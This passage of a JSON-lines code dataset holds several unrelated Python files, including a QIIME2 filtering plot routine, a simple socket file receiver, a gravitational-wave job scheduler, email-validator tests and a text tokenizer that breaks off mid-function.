{0, 1, 2, 5, 10, 100, 1000},\n 'abundPercent': {0, .001, .01, .02, .03, .05, .1}})\n\n scales = {}\n currents = {}\n for pair, filt_d in filtering.items():\n for filt, dat_preval_abund in filt_d.items():\n for (dat, mb), preval_abund in dat_preval_abund.items():\n\n preval, abund = map(float, preval_abund)\n\n if preval == 0 and abund == 0:\n continue\n if preval < 1:\n preval_label = 'prevalPercent'\n else:\n preval_label = 'prevalCount'\n\n if abund < 1:\n abund_label = 'abundPercent'\n else:\n abund_label = 'abundCount'\n\n if (preval_label, abund_label) not in scales:\n scales[(preval_label, abund_label)] = {}\n if (dat, mb) not in scales[(preval_label, abund_label)]:\n currents.setdefault((dat, mb), []).append((preval, abund))\n scales[(preval_label, abund_label)][(dat, mb)] = (\n defaults[0][preval_label], defaults[1][abund_label])\n scales[(preval_label, abund_label)][(dat, mb)][0].add(preval)\n scales[(preval_label, abund_label)][(dat, mb)][1].add(abund)\n\n for (preval_label, abund_label), dats_d in scales.items():\n out_dir = get_analysis_folder(\n i_datasets_folder, 'filter3D/scale_%s_%s' % (preval_label, abund_label))\n for (dat_, mb), prevals_abunds in dats_d.items():\n if dat_ in datasets_filt:\n dat = datasets_filt[dat_]\n else:\n dat = dat_\n if dat not in datasets:\n if '__raref' in dat:\n split = dat.split('__raref')\n dat = 
'__raref'.join(split[:-1])\n raref = '_raref%s' % '__raref'.join(split[-1:])\n if dat in datasets_filt:\n dat = datasets_filt[dat]\n tsv_pd_, meta_pd_, meta = get_raref_table(dat, raref, i_datasets_folder, 'filter3D')\n if not tsv_pd_.shape[0]:\n continue\n dat = '%s_%s' % (dat, raref)\n else:\n print('dataset \"%s\" not found...' % dat)\n continue\n elif not isinstance(datasets_read[dat][0], pd.DataFrame) and datasets_read[dat][0] == 'raref':\n tsv, meta = datasets[dat]\n if not isfile(tsv):\n print('Must have run rarefaction to use it further...\\nExiting')\n sys.exit(0)\n tsv_pd_, meta_pd_ = get_raref_tab_meta_pds(meta, tsv)\n datasets_read[dat] = [[tsv_pd_, meta_pd_]]\n else:\n tsv_pd_, meta_pd_ = datasets_read[dat][0]\n\n res = []\n rdx = 0\n prevals, abunds = prevals_abunds\n for (preval, abund) in itertools.product(*[sorted(prevals), sorted(abunds)]):\n rdx += 1\n tsv_pd = tsv_pd_.loc[tsv_pd_.sum(1) > 0, :].copy()\n tsv_pd = tsv_pd.loc[:, tsv_pd.sum(0) > 0]\n if mb:\n tsv_pd, cur_res = filter_mb_table(preval, abund, tsv_pd, True)\n else:\n tsv_pd, cur_res = filter_non_mb_table(preval, abund, tsv_pd, True)\n if (preval, abund) in currents[(dat, mb)]:\n cur_res.append(1)\n else:\n cur_res.append(0)\n res.append(cur_res)\n res_pd = pd.DataFrame(res, columns=['preval_filt', 'abund_filt', 'features',\n 'samples', 'data'])\n res_pd['features'] = np.log10(res_pd['features']+1)\n x = res_pd.preval_filt.unique()\n y = res_pd.abund_filt.unique()\n X, Y = np.meshgrid(x, y)\n Z = res_pd.features.values.reshape(X.shape, order='f')\n\n layout = go.Layout(\n scene=dict(\n xaxis=dict(title=abund_label),\n yaxis=dict(title=preval_label),\n zaxis=dict(title='log10(features)')),\n autosize=True,\n width=700, height=700,\n title=\"Filtering process\",\n margin=dict(l=65, r=50, b=65, t=90))\n fig = go.Figure(\n data=[\n go.Surface(\n x=Y, y=X, z=Z,\n colorscale='Viridis',\n reversescale=True)\n ],\n layout=layout\n )\n fig.update_traces(contours_z=dict(show=True, usecolormap=True,\n highlightcolor=\"limegreen\", project_z=True))\n fig.add_scatter3d(\n y=X.flatten(), x=Y.flatten(), z=Z.flatten(),\n mode='markers', marker=dict(size=4, color='black'))\n res_data_pd = res_pd.loc[(res_pd.data == 1)].copy()\n x = res_data_pd.preval_filt.unique()\n y = res_data_pd.abund_filt.unique()\n X, Y = np.meshgrid(x, y)\n Z = res_data_pd.features.values.reshape(X.shape, order='f')\n fig.add_scatter3d(\n y=X.flatten(), x=Y.flatten(), z=Z.flatten(),\n mode='markers', marker=dict(size=6, color='red'))\n html_fo = '%s/%s_%s.html' % (out_dir, dat, mb)\n print(' -> Written:', html_fo)\n plotly.offline.plot(fig, filename=html_fo, auto_open=False)\n","sub_path":"routine_qiime2_analyses/_routine_q2_filter.py","file_name":"_routine_q2_filter.py","file_ext":"py","file_size_in_byte":23434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"132522090","text":"import tkinter as tk\n\n# counter = 0 \n# def counter_label(label):\n# def count():\n# global counter\n# counter += 1\n# label.config(text=str(counter))\n# label.after(1000, count)\n# count()\n\n\ndef data_label(label,name,value):\n def count():\n# global counter\n# counter += 1\n dis = name + ' ' + str(value)\n label.config(text=dis)\n label.after(1000, count)\n count()\n \nroot = tk.Tk()\nroot.title(\"Counting Seconds\")\nlabel = tk.Label(root, fg=\"green\")\n\n# label.place(relx = 0.3, \n# rely = 0.1, \n# anchor = 'center')\n\nlabel.pack()\ndata_label(label,'Temp',20)#\n\nlabel2 = tk.Label(root, 
fg=\"green\")\nlabel2.pack()\ndata_label(label2,'HUM',70)\n\nbutton = tk.Button(root, text='Stop', width=25, command=root.destroy)\nbutton.pack()\nroot.mainloop()\n\n\n","sub_path":".ipynb_checkpoints/tes-checkpoint.py","file_name":"tes-checkpoint.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"592775894","text":"frase = str(input(\"Enter any sentence: \")).strip().upper()\npalavras = frase.split()\njunto = ''.join(palavras)\ninverso = ''\nfor letra in range(len(junto)-1,-1,-1):\n inverso += junto[letra]\nprint(junto,inverso)\nif junto == inverso:\n print(\"It is a palindrome\")\nelse:\n print(\"It is not a palindrome\")\n","sub_path":"Gustavo Guanabara/#53 - Palindromo.py","file_name":"#53 - Palindromo.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"243492060","text":"import socket\n\nserver = socket.socket()\n\nhost = socket.gethostname() # getting hostname\nip = socket.gethostbyname(host) # getting ip\nport = 9000\n\nbuffer_size = 250000000 # 250mb\n\nserver.bind((host, port))\nserver.listen()\n\nprint(\"Listening at Server IP : {} & Port : {}\".format(ip, str(port)))\n\nclient, address = server.accept()\n\nprint(\"{} is connected\".format(address))\n\nfd = open(\"received-file\", \"wb\")\nbytes_read = client.recv(buffer_size) # receiving file\nfd.write(bytes_read)\n\nclient.close()\nserver.close()","sub_path":"file-transfer/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"183878735","text":"# Written by Ryan Quitzow-James\n\nfrom __future__ import division\nfrom math import ceil\n\n# opens a file, outputs a 2-d array (1st dimension - line, 2nd dimension - word)\ndef readFile(file_name, delimiter = None):\n with open(file_name, \"r\") as infile:\n content = [x.split(delimiter) for x in infile]\n return content\n\ndef loadLines(filename):\n with open(filename, \"r\") as infile:\n data = [[y.strip(\"_\") for y in x.split()] for x in infile]\n return data\n\ndef saveText(file_name, output_text):\n with open(file_name, \"w\") as outfile:\n outfile.write(output_text)\n\n# takes directory+filename, outputs full path (takes care of \"/\"s)\ndef glueFileLocation(directory, filename):\n output = None\n if directory[-1] == \"/\":\n if filename[0] == \"/\":\n output = directory + filename[1:]\n else:\n output = directory + filename\n else:\n if filename[0] == \"/\":\n output = directory + filename\n else:\n output = directory + \"/\" + filename\n return output\n\ndef lineCut1Hz(line_info, delta_F):\n band = line_info[0].split(\"-\")\n if len(band) > 0:\n #band_low = band[0]#min(line_center_int(band[0]))\n #band_high = band[1]#max(line_center_int(band[-1]))\n band_low = int(ceil(float(band[0])))\n band_high = int(float(band[-1]))\n notch_lines = [x for x in range(band_low, band_high + 1)]\n else:\n notch_lines = None\n return notch_lines\n\ndef findOverlappingTimes(timeList1, timeList2):\n index_2 = 0\n dual_segments = []\n for seg_1 in timeList1:\n start_1 = int(seg_1[0])\n end_1 = int(seg_1[1])\n if index_2 < len(timeList2):\n while int(timeList2[index_2][1]) <= start_1:\n index_2 += 1\n break_loop = False\n if index_2 >= len(timeList2):\n break_loop = True\n while not break_loop:\n start_2 = int(timeList2[index_2][0])\n end_2 = int(timeList2[index_2][1])\n if start_2 >= end_1:\n 
break_loop = True\n else:\n if start_1 > start_2:\n seg_start = start_1\n else:\n seg_start = start_2\n if end_1 > end_2:\n index_2 += 1\n seg_end = end_2\n else:\n break_loop = True\n seg_end = end_1\n dual_segments += [[seg_start, seg_end]]\n \"\"\"seg_start = max(start_1, start_2)\n seg_end = min(end_1, end_2)\n dual_segments += [[seg_start, seg_end]]\n if end_1 > end_2:\n index_2 += 1\n else:\n break_loop = True\"\"\"\n if index_2 >= len(timeList2):\n break_loop = True\n return dual_segments\n\ndef calculateSegmentBuffer(NSPI, pixel_duration, buffer_seconds):\n buffer_time = (NSPI - 1) * pixel_duration / 2 + buffer_seconds\n return buffer_time\n\ndef getShortSegTimes(segment, long_buffer, short_buffer, long_pre_trigger, short_pre_trigger, short_preproc_job_duration):\n job_start = segment[0]\n trigger_time = job_start + long_buffer + long_pre_trigger\n job_short_start = trigger_time - short_pre_trigger - short_buffer\n job_short_end = job_short_start + short_preproc_job_duration\n return [job_short_start, job_short_end]\n\n#def calculateWindows(time_list, job_buffer):\n# return None\n\nclass backgroundJobSet(object):\n def __init__(self, NSPI = 9, long_pixel_duration = 4, short_pixel_duration = 1, job_buffer = 1, time_shift = 1, buffer_seconds = 2, short_job_post_trigger = 400, short_job_pre_trigger = 10, possible_interval_list = None, post_veto_times = None, bad_times = None, essential_jobs = None, essential_short_jobs = None, long_job_duration_override = None, short_job_duration_override = None):\n self.NSPI = NSPI\n self.longPixelDuration = long_pixel_duration\n self.shortPixelDuration = short_pixel_duration\n self.jobBuffer = job_buffer\n self.timeShift = time_shift\n self.bufferSeconds = buffer_seconds\n self.calculateSegmentBuffers()\n self.shortJobPreTrigger = short_job_pre_trigger\n self.shortJobPostTrigger = short_job_post_trigger\n self.possibleIntervalList = possible_interval_list\n self.essential_jobs = essential_jobs\n self.essential_short_jobs = essential_short_jobs\n self.long_job_duration_override = long_job_duration_override\n self.short_job_duration_override = short_job_duration_override\n if self.possibleIntervalList:\n self.calculateJobs()\n if post_veto_times:\n self.findPostVetoJobs(post_veto_times, bad_times)\n\n def calculateSegmentBuffers(self):\n self.longSegmentBuffer = calculateSegmentBuffer(self.NSPI, self.longPixelDuration, self.bufferSeconds)\n self.shortSegmentBuffer = calculateSegmentBuffer(self.NSPI, self.shortPixelDuration, self.bufferSeconds)\n\n def getShortSegTime(self, segment):\n job_start = segment[0]\n trigger_time = job_start + self.longSegmentBuffer + self.longJobPreTrigger\n job_short_start = trigger_time - self.shortJobPreTrigger - self.shortSegmentBuffer\n job_short_end = job_short_start + self.shortPreprocJobDuration\n return [job_short_start, job_short_end]\n\n def calculateJobs(self):\n #print(self.possibleIntervalList)\n print(\"Preparing job list from possibleIntervalList\")\n self.longJobPostTrigger = self.shortJobPostTrigger * self.longPixelDuration / self.shortPixelDuration\n self.longJobPreTrigger = self.shortJobPreTrigger * self.longPixelDuration / self.shortPixelDuration\n self.longJobDuration = self.longJobPreTrigger + self.longJobPostTrigger\n if self.long_job_duration_override:\n self.longPreprocJobDuration = self.long_job_duration_override\n else:\n self.longPreprocJobDuration = self.longJobDuration + 2*self.longSegmentBuffer + int(ceil(self.longPixelDuration/2))\n self.longJobStartSeparation = self.longPreprocJobDuration + 
self.jobBuffer\n\n self.shortJobDuration = self.shortJobPreTrigger + self.shortJobPostTrigger\n if self.short_job_duration_override:\n self.shortPreprocJobDuration = self.short_job_duration_override\n else:\n self.shortPreprocJobDuration = self.shortJobDuration + 2*self.shortSegmentBuffer + int(ceil(self.shortPixelDuration/2))\n\n # create list of long duration jobs\n job_start_dif = self.longJobStartSeparation\n effective_job_length = self.longPreprocJobDuration\n #temp_job_list = [[[x[0] + y*(job_start_dif), x[0] + y*(job_start_dif) + effective_job_length]\n # for y in range(int((x[1] - x[0])//(job_start_dif)))] for x in self.possibleIntervalList]\n temp_job_list = [create_jobs_from_interval(x, job_start_dif, effective_job_length) for x in self.possibleIntervalList]\n if not temp_job_list[0]:\n print(\"Temporary version of interval checker that checks first interval only. This function should be updated to include the last possible interval even if there is no buffer after it since it would be the last one. This probably entails making the first section per interval separately, then the rest based on having the buffer between jobs in front.\")\n if self.possibleIntervalList[0][1] - self.possibleIntervalList[0][0] >= effective_job_length:\n temp_job_list = [[[self.possibleIntervalList[0][0],self.possibleIntervalList[0][0] + effective_job_length]]]\n #print(temp_job_list)\n #print(job_start_dif)\n #print(int((x[1] - x[0])//(job_start_dif)))\n # flatten job list into just a list of lists, instead of a list of lists of lists\n print(\"Finding long jobs\")\n self.longJobs = [y for x in temp_job_list for y in x]\n if self.essential_jobs:\n self.longJobs += self.essential_jobs\n self.longJobList = self.longJobs[:]\n print(\"Finding short jobs\")\n self.shortJobs = [self.getShortSegTime(x) for x in self.longJobs]\n if self.essential_short_jobs:\n self.shortJobs += self.essential_short_jobs\n print(\"Creating full list of jobs\")\n temp_full_list = [[self.longJobs[num], self.shortJobs[num]] for num in range(len(self.longJobs))]\n print(\"flattening list of jobs\")\n flat_temp_full_list = [y for x in temp_full_list for y in x]\n print(\"Creating job list\")\n self.jobList = [[num + 1] + flat_temp_full_list[num] + [flat_temp_full_list[num][1] - flat_temp_full_list[num][0]] for num in range(len(flat_temp_full_list))]\n print(\"Creating preprocJobList\")\n self.preprocJobList = [[num + 1] + flat_temp_full_list[num] + [flat_temp_full_list[num][1] - flat_temp_full_list[num][0]] for num in range(len(flat_temp_full_list))]\n print(\"Creating burstegardPreprocJobList\")\n self.burstegardPreprocJobList = [[num + 1] + self.longJobs[num] + [self.longJobs[num][1] - self.longJobs[num][0]] for num in range(len(self.longJobs))]\n #print(self.shortJobs)\n print(\"Creating jobMap\")\n self.jobMap = dict((job+1, job+1) for job in range(len(self.preprocJobList)))\n self.longJobMap = dict((job+1, job+1) for job in range(len(self.longJobList)))\n print(\"Creating burstegardJobMap\")\n self.burstegardJobMap = dict((job+1, job+1) for job in range(len(self.burstegardPreprocJobList)))\n print(\"Done creating possible jobs\")\n #print(\"In object\")\n #print(self.jobList)\n\n def alignIntervals(self, time_segments, pixel_duration):\n #print(\"test\")\n #print(time_segments)\n end_buffer = (self.NSPI - 1)*pixel_duration/2 + self.bufferSeconds\n front_time = time_segments[0][0]\n #print(front_time)\n #print(time_segments[0])\n temp_intervals = [x if (x[0] - front_time) % (pixel_duration/2) == 0 else [x[0] + ((x[0] - front_time) 
% (pixel_duration/2)), x[1]] for x in time_segments]\n #print(temp_intervals)\n temp_intervals = [x if (x[1] - x[0] - 2*self.bufferSeconds) % (pixel_duration/2) == 0 else [x[0], x[1] - ((x[1] - x[0] - 2*self.bufferSeconds) % (pixel_duration/2))] for x in temp_intervals]\n #print(temp_intervals)\n return temp_intervals\n\n def cutBadTimes(self, interval, bad_times):\n tempBadTimes = [x for x in bad_times if interval[0] <= x < interval[1]]\n if len(tempBadTimes) > 0:\n timeList = []\n if tempBadTimes[0] > interval[0]:\n timeList += [[interval[0], tempBadTimes[0]]]\n if len(tempBadTimes) > 1:\n timeList += [[tempBadTimes[num] + 1, tempBadTimes[num+1]] for num in range(len(tempBadTimes)-1)]\n if tempBadTimes[-1] + 1 < interval[1]:\n timeList += [[tempBadTimes[-1] + 1, interval[1]]]\n else:\n timeList = [interval]\n return timeList\n\n def findJobTimeNotDuringVeto(self, interval, post_veto_times, bad_times, pixel_duration):\n post_times_of_interest = [x for x in post_veto_times if x[0] < interval[1] and x[1] > interval[0]]\n num_times = len(post_times_of_interest)\n if num_times > 1:\n times = [[max([interval[0], post_times_of_interest[0][0]]), post_times_of_interest[0][1]]]\n if num_times > 2:\n times += post_times_of_interest[1:-1]\n times += [[post_times_of_interest[-1][0], min([interval[1], post_times_of_interest[-1][1]])]]\n elif num_times == 1:\n times = [[max([interval[0], post_times_of_interest[0][0]]), min([interval[1], post_times_of_interest[0][1]])]]\n else:\n times = []\n if len(times) > 0:\n #print(times)\n if bad_times:\n times = [self.cutBadTimes(x, bad_times) for x in times]\n #print(times)\n times = [x for y in times for x in y]\n #print(times)\n times = self.alignIntervals(times, pixel_duration)\n #print(times)\n times = [x for x in times if x[1] - x[0] >= self.NSPI * pixel_duration + self.bufferSeconds*2]\n return times\n\n def findPostVetoJobs(self, post_veto_times, bad_times):\n print(\"Creating post veto jobs\")\n temp_interval_list_long = [self.findJobTimeNotDuringVeto(x, post_veto_times, bad_times, self.longPixelDuration) for x in self.longJobs]\n temp_interval_list_short = [self.findJobTimeNotDuringVeto(x, post_veto_times, bad_times, self.shortPixelDuration) for x in self.shortJobs]\n temp_burstegard_interval_list = [self.findJobTimeNotDuringVeto(x, post_veto_times, bad_times, self.shortPixelDuration) for x in self.longJobs]\n temp_full_list = [[temp_interval_list_long[num], temp_interval_list_short[num]] for num in range(len(temp_interval_list_long))]\n flat_temp_full_list = [y for x in temp_full_list for y in x]\n temp_job_counter = 0\n self.jobMap = {}\n # map jobs\n for num in range(len(flat_temp_full_list)):\n old_job_num = num + 1\n num_new_jobs = len(flat_temp_full_list[num])\n temp_list = [temp_job_counter + x + 1 for x in range(num_new_jobs)]\n if temp_list:\n self.jobMap[old_job_num] = [temp_job_counter + x + 1 for x in range(num_new_jobs)]\n temp_job_counter += num_new_jobs\n self.burstegardJobMap = {}\n # map jobs\n temp_job_counter = 0\n for num in range(len(temp_burstegard_interval_list)):\n old_job_num = num + 1\n num_new_jobs = len(temp_burstegard_interval_list[num])\n temp_list = [temp_job_counter + x + 1 for x in range(num_new_jobs)]\n if temp_list:\n self.burstegardJobMap[old_job_num] = [temp_job_counter + x + 1 for x in range(num_new_jobs)]\n temp_job_counter += num_new_jobs\n self.longJobMap = {}\n # map jobs\n temp_job_counter = 0\n for num in range(len(temp_interval_list_long)):\n old_job_num = num + 1\n num_new_jobs = 
len(temp_interval_list_long[num])\n temp_list = [temp_job_counter + x + 1 for x in range(num_new_jobs)]\n if temp_list:\n self.longJobMap[old_job_num] = [temp_job_counter + x + 1 for x in range(num_new_jobs)]\n #print(old_job_num)\n #print(temp_job_counter)\n temp_job_counter += num_new_jobs\n #print(temp_interval_list_long)\n #print(self.longJobMap)\n flat_interval_list = [y for x in flat_temp_full_list for y in x]\n flat_long_interval_list = [y for x in temp_interval_list_long for y in x]\n flat_long_burstegard_list = [y for x in temp_burstegard_interval_list for y in x]\n self.preprocJobList = [[num + 1] + flat_interval_list[num] + [flat_interval_list[num][1] - flat_interval_list[num][0]] for num in range(len(flat_interval_list))]\n self.longJobList = [[num + 1] + flat_long_interval_list[num] + [flat_long_interval_list[num][1] - flat_long_interval_list[num][0]] for num in range(len(flat_long_interval_list))]\n self.burstegardPreprocJobList = [[num + 1] + flat_long_burstegard_list[num] + [flat_long_burstegard_list[num][1] - flat_long_burstegard_list[num][0]] for num in range(len(flat_long_burstegard_list))]\n print(\"Complete\")\n\n \"\"\"\n def findPostVetoJobs(self, post_veto_times, bad_times):\n print(\"Creating post veto jobs\")\n temp_interval_list_long = [self.findJobTimeNotDuringVeto(x, post_veto_times, bad_times, self.longPixelDuration) for x in self.longJobs]\n temp_interval_list_short = [self.findJobTimeNotDuringVeto(x, post_veto_times, bad_times, self.shortPixelDuration) for x in self.shortJobs]\n temp_full_list = [[temp_interval_list_long[num], temp_interval_list_short[num]] for num in range(len(temp_interval_list_long))]\n flat_temp_full_list = [y for x in temp_full_list for y in x]\n temp_job_counter = 0\n self.jobMap = {}\n # map jobs\n for num in range(len(flat_temp_full_list)):\n old_job_num = num + 1\n num_new_jobs = len(flat_temp_full_list[num])\n temp_list = [temp_job_counter + x + 1 for x in range(num_new_jobs)]\n if temp_list:\n self.jobMap[old_job_num] = [temp_job_counter + x + 1 for x in range(num_new_jobs)]\n temp_job_counter += num_new_jobs\n self.burstegardJobMap = {}\n # map jobs\n temp_job_counter = 0\n for num in range(len(temp_interval_list_long)):\n old_job_num = num + 1\n num_new_jobs = len(temp_interval_list_long[num])\n temp_list = [temp_job_counter + x + 1 for x in range(num_new_jobs)]\n if temp_list:\n self.burstegardJobMap[old_job_num] = [temp_job_counter + x + 1 for x in range(num_new_jobs)]\n temp_job_counter += num_new_jobs\n flat_interval_list = [y for x in flat_temp_full_list for y in x]\n flat_long_interval_list = [y for x in temp_interval_list_long for y in x]\n self.preprocJobList = [[num + 1] + flat_interval_list[num] + [flat_interval_list[num][1] - flat_interval_list[num][0]] for num in range(len(flat_interval_list))]\n self.burstegardPreprocJobList = [[num + 1] + flat_long_interval_list[num] + [flat_long_interval_list[num][1] - flat_long_interval_list[num][0]] for num in range(len(flat_long_interval_list))]\n print(\"Complete\")\"\"\"\n\n def saveJobs(self, job_file_name):\n output_text = \"\\n\".join(\" \".join(str(int(x)) for x in line) for line in self.preprocJobList)\n saveText(job_file_name, output_text)\n\n def saveBurstegardJobs(self, job_file_name):\n output_text = \"\\n\".join(\" \".join(str(int(x)) for x in line) for line in self.burstegardPreprocJobList)\n saveText(job_file_name, output_text)\n\n def saveLongJobs(self, job_file_name):\n output_text = \"\\n\".join(\" \".join(str(int(x)) for x in line) for line in 
self.longJobList)\n saveText(job_file_name, output_text)\n\ndef create_jobs_from_interval(interval, job_start_difference, temp_effective_job_length):\n #print(\"Calculating jobs for interval \" + str(interval))\n #print(temp_effective_job_length)\n number_jobs = int((interval[1] - interval[0])//(job_start_difference))\n temp_jobs = [[interval[0] + y*(job_start_difference), interval[0] + y*(job_start_difference) + temp_effective_job_length]\n for y in range(number_jobs)]\n if not temp_jobs:\n if interval[1] - interval[0] >= temp_effective_job_length:\n temp_jobs = [[interval[0], interval[0] + temp_effective_job_length]]\n elif interval[1] - temp_jobs[-1][1] >= job_start_difference:\n print(\"extra job\")\n print(\"temp_effective_job_length\")\n print(temp_effective_job_length)\n print([interval[1] - temp_effective_job_length, interval[1]])\n print(\"\\n\\n\\n\")\n temp_jobs += [[interval[1] - temp_effective_job_length, interval[1]]]\n #print(str(number_jobs) + \" jobs created\")\n return temp_jobs\n","sub_path":"create_config_file/generateInputFileLib.py","file_name":"generateInputFileLib.py","file_ext":"py","file_size_in_byte":19327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"513490828","text":"from Lab5_SP2.Stack import Stack\r\nimport Lab5_SP2.Utils as ut\r\nfrom termcolor import colored\r\n\r\n\r\ndef parse_to_tree(string):\r\n string += \" \"\r\n output = \"\"\r\n i = 0\r\n tabs = \"\"\r\n st = Stack()\r\n st1 = Stack()\r\n while len(string) > 0:\r\n\r\n root = string[:string.index(\" \")]\r\n if root == \"for\":\r\n root = string[:string.index(\"do\") + 2]\r\n string = string[len(root) + 1:]\r\n output += \"\\t\" * i + \"for_loop statement\\n\"\r\n i += 1\r\n elif root == \"if\":\r\n root = string[:string.index(\"then\") + 4]\r\n string = string[len(root) + 1:]\r\n st1.push(i)\r\n output += \"\\t\" * i + \"if_node\\n\" + \"\\t\" * i +\" bool_expression\\n\" + \"\\t\" * i + \" then_node\\n\"\r\n i += 1\r\n elif root == \"begin\":\r\n string = string[len(root) + 1:]\r\n st.push(i)\r\n #output += \"\\t\" * i + \"begin_node\" + \"\\n\"\r\n elif root == \"end;\":\r\n string = string[len(root) + 1:]\r\n\r\n #output += \"\\t\" * st.pop() + \"end_node\" + \"\\n\"\r\n elif root == \"else\":\r\n string = string[len(root) + 1:]\r\n i = st1.pop()\r\n output += \"\\t\" * i + \"else_node\" + \"\\n\"\r\n i += 1\r\n else:\r\n root = string[:string.index(\"end;\")]\r\n output += \"\\t\" * i + \"expression\" + \"\\n\"\r\n string = string[len(root):]\r\n i += 1\r\n\r\n print(output)\r\n # print(string)\r\n\r\n\r\ndef check_syntax(string):\r\n check = True\r\n tokens = [\"for\", \"to\", \"do\", \"begin\", \"if\", \"then\", \"else\",\r\n \"begin\", \"end\", \":=\", \">\", \"<\", \">=\", \"<=\", \"=\",\r\n \"(\", \")\", \";\", \"[\", \"]\"]\r\n inp = string.split(\" \")\r\n\r\n if not ut.begin_end_checker(inp):\r\n print(colored('Exception: wrong number of \"begin\" and \"end\" words', 'red'))\r\n return False\r\n\r\n if not ut.brackets_checker(string):\r\n print(colored('Exception: wrong number of brackets', 'red'))\r\n return False\r\n\r\n if not ut.for_loop_checker(inp):\r\n print(colored('Exception: wrong loop', 'red'))\r\n return False\r\n\r\n if not ut.if_else_checker(inp):\r\n print(colored('Exception: if-then-else checker', 'red'))\r\n return False\r\n\r\n if not ut.check_semicol(inp):\r\n print(colored('Exception: missing \";\"', 'red'))\r\n return False\r\n\r\n return True\r\n\r\n\r\nif __name__ == '__main__':\r\n input_str = \"if (a > 
b) then begin for i := 1 to do k:=5; end;\"\r\n\r\n print(colored(input_str, 'green'))\r\n\r\n if check_syntax(input_str):\r\n print(\"Syntax is correct\")\r\n print(\"Tree:\")\r\n parse_to_tree(input_str)\r\n print(\"Table:\")\r\n ut.print_table(input_str.split(\" \"))\r\n else:\r\n print(\"Syntax error\")\r\n","sub_path":"V семестр/Системне програмування - 2/Бровченко/sys_prog/Lab5_SP2/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"220663435","text":"# -*- coding: utf-8 -*-\nimport pytest\n\nfrom validators import email, ValidationFailure\n\n\n@pytest.mark.parametrize(('value', 'whitelist'), [\n ('email@here.com', None),\n ('weirder-email@here.and.there.com', None),\n ('email@[127.0.0.1]', None),\n ('example@valid-----hyphens.com', None),\n ('example@valid-with-hyphens.com', None),\n ('test@domain.with.idn.tld.उदाहरण.परीक्षा', None),\n ('email@localhost', None),\n ('email@localdomain', ['localdomain']),\n ('\"test@test\"@example.com', None),\n ('\"\\\\\\011\"@here.com', None),\n])\ndef test_returns_true_on_valid_email(value, whitelist):\n assert email(value, whitelist=whitelist)\n\n\n@pytest.mark.parametrize(('value',), [\n (None,),\n ('',),\n ('abc',),\n ('abc@',),\n ('abc@bar',),\n ('a @x.cz',),\n ('abc@.com',),\n ('something@@somewhere.com',),\n ('email@127.0.0.1',),\n ('example@invalid-.com',),\n ('example@-invalid.com',),\n ('example@inv-.alid-.com',),\n ('example@inv-.-alid.com',),\n (\n 'john56789.john56789.john56789.john56789.john56789.john56789.john5'\n '@example.com',\n ),\n # Quoted-string format (CR not allowed)\n ('\"\\\\\\012\"@here.com',),\n])\ndef test_returns_failed_validation_on_invalid_email(value):\n assert isinstance(email(value), ValidationFailure)\n","sub_path":"tests/test_email.py","file_name":"test_email.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"178035738","text":"from django.contrib import admin\nfrom namelist.models import Category, Player\n\n\nclass PlayerAdmin(admin.ModelAdmin):\n list_display = ['name', 'category']\n list_filter = ['category', 'group_name']\n\nadmin.site.register(Category)\nadmin.site.register(Player, PlayerAdmin)\n","sub_path":"brains/namelist/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"164364569","text":"from typing import List\n\nfrom kai.tokenizer.constants import is_whitespace, is_fullstop, is_hyphen\nfrom kai.tokenizer.constants import is_singlequote, is_doublequote, is_specialcharacter\nfrom kai.tokenizer.constants import is_punctuation, is_numeric, is_ABC\nfrom kai.parser.model import Token\n\nno_space_before = {\";\", \"n't\", \"'s\", \"'ll\", \".\", \",\", \"?\", \"!\", \":\", \"'m\", \"'re\", \")\", \"]\", \"}\", \"’ve\"}\nno_space_after = {\"(\", \"[\", \"{\"}\n\n\nclass Tokenizer:\n def __init__(self):\n self.punc = {}\n for ch in \"!,.?;\":\n self.punc[ch] = True\n\n # turn a string into a list of tokens using pre-defined constants\n def tokenize_string(self, in_str: str) -> List[str]:\n token_list = []\n length = len(in_str)\n i = 0\n tokenIndex = 0\n while i < length:\n\n tokenHandled = False # stop when we have the token done\n ch = in_str[i]\n while is_whitespace(ch) and i < length:\n tokenHandled = True\n i = i + 1\n if i < length:\n ch = in_str[i]\n\n if 
tokenHandled: # single whitespace\n token_list.append(\" \")\n\n # add full-stops?\n while is_fullstop(ch) and i < length:\n tokenHandled = True\n token_list.append(\".\")\n tokenIndex += 1\n i += 1\n if i < length:\n ch = in_str[i]\n\n # add hyphens?\n while is_hyphen(ch) and i < length:\n tokenHandled = True\n token_list.append(\"-\")\n tokenIndex += 1\n i += 1\n if i < length:\n ch = in_str[i]\n\n # add single quotes?\n while is_singlequote(ch) and i < length:\n tokenHandled = True\n token_list.append(\"'\")\n tokenIndex += 1\n i += 1\n if i < length:\n ch = in_str[i]\n\n # add single quotes?\n while is_doublequote(ch) and i < length:\n tokenHandled = True\n token_list.append(\"\\\"\")\n tokenIndex += 1\n i += 1\n if i < length:\n ch = in_str[i]\n\n # add special characters ( ) etc.\n while is_specialcharacter(ch) and i < length:\n tokenHandled = True\n token_list.append(\"\" + ch)\n tokenIndex += 1\n i += 1\n if i < length:\n ch = in_str[i]\n\n # add punctuation ! ? etc.\n while is_punctuation(ch) and i < length:\n tokenHandled = True\n token_list.append(\"\" + ch)\n tokenIndex += 1\n i += 1\n if i < length:\n ch = in_str[i]\n\n # numeric processor\n helper = []\n while is_numeric(ch) and i < length:\n tokenHandled = True\n helper.append(ch)\n i += 1\n if i < length:\n ch = in_str[i]\n\n if len(helper) > 0:\n token_list.append(''.join(helper))\n 